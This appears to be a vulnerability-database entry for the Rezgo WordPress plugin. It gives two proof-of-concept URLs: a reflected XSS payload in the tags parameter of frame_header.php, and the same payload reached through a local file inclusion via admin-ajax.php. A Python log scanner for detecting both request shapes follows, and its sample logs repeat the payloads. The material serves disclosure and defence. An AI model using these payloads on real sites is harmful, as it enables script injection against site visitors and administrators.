## https://sploitus.com/exploit?id=WPEX-ID:005C2300-F6BD-416E-97A6-D42284BBB093
Direct call: https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

Via the LFI:

Once the plugin is configured (a dummy "Rezgo Company Code" and "Rezgo API Key" in the "Account Information" settings section can be used):

http://example.com/wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E
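
For defenders, a log check for the two request shapes shown above (added example, not part of the original entry): it scans web access log lines for requests that reach frame_header either directly or through admin-ajax.php with action=rezgo, and reports whether the decoded tags parameter carries HTML metacharacters. The function names and the sample log lines are constructed for illustration, and the check assumes benign tags values never contain quotes or angle brackets.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters that let a value break out of an HTML attribute or open a tag.
HTML_META = re.compile("[<>\"']")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return a finding for a request URL, or None if it is not one of the two routes."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are percent-decoded
    path = parts.path
    direct = "/wp-content/plugins/rezgo/" in path and path.endswith("/frame_header.php")
    via_ajax = (path.endswith("/wp-admin/admin-ajax.php")
                and "rezgo" in params.get("action", [])
                and any("templates/" in m for m in params.get("method", [])))
    if not (direct or via_ajax):
        return None
    route = "direct" if direct else "admin-ajax"
    if any(HTML_META.search(v) for v in params.get("tags", [])):
        return f"{route}: markup in tags"
    return f"{route}: template reached"

def scan(lines):
    """Return (line_number, finding) for every log line that matches either route."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        finding = classify(match.group(1)) if match else None
        if finding:
            findings.append((number, finding))
    return findings

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 52',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E HTTP/1.1" 200 913',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E HTTP/1.1" 200 913',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=boat HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```

A "template reached" finding without markup is still worth reviewing, since a template file being served directly or through the method parameter is the precondition for both request shapes.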